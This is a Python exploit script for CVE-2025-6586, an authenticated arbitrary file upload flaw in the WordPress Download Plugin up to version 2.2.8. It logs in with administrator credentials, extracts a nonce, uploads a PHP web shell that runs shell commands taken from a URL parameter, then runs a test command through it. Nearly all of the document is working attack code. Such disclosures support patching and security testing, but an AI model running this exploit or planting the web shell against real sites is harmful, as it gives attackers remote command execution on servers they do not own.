# Exploit Title: Download Plugin <= 2.2.8 - Authenticated (Administrator+) Arbitrary File Upload
# Date: 04/29/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://metagauss.com/
# Version: <=  2.2.8
# CVE : CVE-2025-6586

import re
import json
import urllib3
import requests
import argparse
import urllib.parse


def extract_nonce(text):
    match = re.search(r'<input[^>]+name="_wpnonce"[^>]+value="([a-fA-F0-9]+)"', text, re.IGNORECASE)
    if match:
        return match.group(1)
    else:
        print("Nonce not found.")
        return None


def wp_login(victim_url: str, username: str, password: str): 

    with requests.Session() as s:
        headers1 = { 'Cookie':'wordpress_test_cookie=WP Cookie check' }
        datas={ 
            'log':username, 'pwd':password, 'wp-submit':'Log In', 
            'redirect_to':f"{victim_url}/wp-admin", 'testcookie':'1'  
        }
        s.post(f"{victim_url}/wp-login.php", headers=headers1, data=datas, verify=False)
        return(s)

def main():

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # Parse command line arguments
    parser = argparse.ArgumentParser(description="CVE-2025-6586: An exploit...")
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("username", help="The username for the WordPress instance.")
    parser.add_argument("password", help="The password for the WordPress instance.")
    args = parser.parse_args()

    # Log into wprdpress and use this session for the requests.
    print(f"Logging into: {args.victim_url}/wp-admin")
    wp_session = wp_login(args.victim_url,args.username,args.password)

   
    ##################################################################################################################################################
    # Grab and prase the HTML for the nonce.
    ##################################################################################################################################################
    print("Extracting nonce values...")
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36'}
    r = wp_session.get(f"{args.victim_url}/wp-admin/admin.php?page=mul_upload", headers=headers, verify=False)
    nonce = extract_nonce(r.text)

    ##################################################################################################################################################
    # Upload the malicious file.
    ##################################################################################################################################################
    print("Uploading web shell: shell.php")
    headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZCsGP30gB42OBWbV"}
    data =  "------WebKitFormBoundaryZCsGP30gB42OBWbV\r\n"
    data += "Content-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n"
    data += f"{nonce}\r\n"
    data += "------WebKitFormBoundaryZCsGP30gB42OBWbV\r\n"
    data += "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n"
    data += "/wp-admin/admin.php?page=mul_upload\r\n"
    data += "------WebKitFormBoundaryZCsGP30gB42OBWbV\r\n"
    data += "Content-Disposition: form-data; name=\"dpwap_locFiles[]\"; filename=\"shell.php\"\r\n"
    data += "Content-Type: application/octet-stream\r\n\r\n"
    data += "<?php\r\n    // Silence is golden\r\n    // If you want to run arbitrary commands a webshell is better.\r\n    if (!empty($_GET['cmd'])) {\r\n        echo \"<pre>\".shell_exec($_GET['cmd']).\"</pre>\";\r\n    }\r\n?>\r\n"
    data += "------WebKitFormBoundaryZCsGP30gB42OBWbV\r\n"
    data += "Content-Disposition: form-data; name=\"dpwap_locInstall\"\r\n\r\n"
    data += "Install Now\r\n"
    data += "------WebKitFormBoundaryZCsGP30gB42OBWbV--\r\n"

    r = wp_session.post(f"{args.victim_url}/wp-admin/admin.php?page=mul_upload", headers=headers, data=data, verify=False)

    ##################################################################################################################################################
    # Test Commands
    ##################################################################################################################################################
    print(f"Web Shell Location: {args.victim_url}/wp-content/uploads/dpwap_logs/files/tmp/shell.php")
    print("")
    print("Executing test command: ip addr")
    r = requests.get(f"{args.victim_url}/wp-content/uploads/dpwap_logs/files/tmp/shell.php?cmd=ip addr", verify=False)
    print(r.text)

if __name__ == "__main__":
    main()